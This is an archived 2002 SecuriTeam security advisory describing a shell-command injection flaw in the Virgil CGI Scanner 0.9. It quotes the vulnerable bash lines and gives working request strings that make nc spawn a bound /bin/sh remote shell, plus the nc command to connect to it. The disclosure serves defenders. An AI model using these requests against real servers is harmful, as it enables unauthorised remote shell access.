[UNIX] Virgil CGI Scanner Vulnerability

From: support@securiteam.com
Date: 10/22/02 

From: support@securiteam.com
To: list@securiteam.com
Date: 22 Oct 2002 21:09:08 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Virgil CGI Scanner Vulnerability
------------------------------------------------------------------------

SUMMARY

Joschka Fischer discovered a security hole in the CGI vulnerability
scanner ' <http://www.computec.ch/> Virgil' by Mark Ruef. By sending a
special crafted request one is able to spawn a remote shell with the
privileges of the running CGI script.

Depending on the used software this is either the owner of the script
(suExec) or the user under which the HTTP daemon is executed (usually
nobody).

DETAILS

Vulnerable systems:
 * Virgil CGI Scanner version 0.9

Virgil CGI Scanner by Mark Ruef is a simple Bash Script which offers an
interface to start CGI security audits against foreign hosts. The author
states that his software represents the first free online-based CGI
scanner and uses a very effective and fast technique to determine
vulnerabilities.

To get the Virgil CGI Scanner look at:
<http://www.computec.ch/software/webserver/virgil_cgi_scanner/virgil-0.9.tar.gz> http://www.computec.ch/software/webserver/virgil_cgi_scanner/virgil-0.9.tar.gz MD5SUM: fe098b68c0de04cb0200f2db324ab10b

For a running version visit:
<http://scanner.computec.ch/cgi-bin/virgil/virgil.cgi>
http://scanner.computec.ch/cgi-bin/virgil/virgil.cgi

Technical Description:
The following vulnerability is present in Virgil CGI Scanner:
   BANNER=`echo -e "HEAD / HTTP/1.0\n\n" |nc -w 10 $TARGET $ZIELPORT`

Here, both variables are user-supplied:

   TARGET=`echo $QUERY_STRING | awk 'BEGIN{FS="&"}{print $1}' |sed
s/"tar="//`
   ZIELPORT=`echo $QUERY_STRING | awk 'BEGIN{FS="&"}{print $2}' |sed
s/"zielport="// |sed "s/-//g"`

Nevertheless there exist a few restrictions, namly:
 - The $QUERY_STRING was not parsed, i.e. %20 for example was not replaced
with ' '
 - In $ZIELPORT the dash ('-') is filtered out

To test whether the script is vulnerable use the following request and
telnet to the given port number (i.e. 31337):
  /cgi-bin/virgil.cgi?tar=-lp&zielport=31337

Exploitation is very straight forwared as long as nc supports the -e
command:
   '/cgi-bin/virgil.cgi?tar=-le/bin/sh' spawns a remote shell on a port
for exactly 10 seconds ("-w 10")! To connect to this shell execute `nc -v
TARGET.COM 1030-6000` while constantly requesting the URI mentioned above.

Workaround / Patch:
We are currently not aware of any patches, but we suggest you to update
your Virgil Vulnerable CGI-Script Database accordingly.

  *** apache.db.old Sun Oct 23 23:05:05 1983
  --- apache.db Sun Oct 23 23:05:05 1985
  ***************
  *** 1,3 ****
  --- 1,5 ----
  + cgi-bin/virgil.cgi?tar=-lp&zielport=31337
  + cgi-bin/virgil/virgil.cgi?tar=-lp&zielport=31337
    cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd

ADDITIONAL INFORMATION

The information has been provided by <mailto:marc.ruef@computec.ch> Marc
Ruef.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • SecurityFocus Microsoft Newsletter #91
    ... SecurityFocus Microsoft Newsletter #91 ... Multiple Bugzilla Security Vulnerabilities ... Geeklog pid CGI Variable SQL Injection Vulnerability ... Geeklog Calendar Event Form Script Injection Vulnerability ...
    (Focus-Microsoft)
  • [NT] Vulnerability in ASP.NET 2.0 Allows Information Disclosure (MS06-056)
    ... Get your security news from a reliable source. ... Vulnerability in ASP.NET 2.0 Allows Information Disclosure ... side script in the user's browser. ... Microsoft Windows Server 2003 for Itanium-based Systems or Windows ...
    (Securiteam)
  • Re: [Full-disclosure] SecNiche : Microsoft Internet Explorer Pop up Blocker Bypassing and Dos Vu
    ... I wonder why we can't find Aditya K Sood in any of the security list even though he has made so many public disclosures. ... Subject: SecNiche: Microsoft Internet Explorer Pop up Blocker Bypassing and Dos Vulnerability ... I don't see anything in the script that can bypass zone security and run ... drawn conclusion that the script can execute from internet zone. ...
    (Full-Disclosure)
  • [NT] Multiple Vulnerabilities in ASPapp Products
    ... Get your security news from a reliable source. ... This vulnerability allows a malicious user set himself any user level he ... "msg" with a value of any script you would like to be run. ... An injection vulnerability exists in forums.asp. ...
    (Securiteam)
  • [VulnWatch] Virgil CGI Scanner Vulnerability
    ... Software: Virgil CGI Scanner 0.9 ... Vulnerability: Privilege Escalation ... Joschka Fischer discovered a security hole in the CGI vulnerability scanner ...
    (VulnWatch)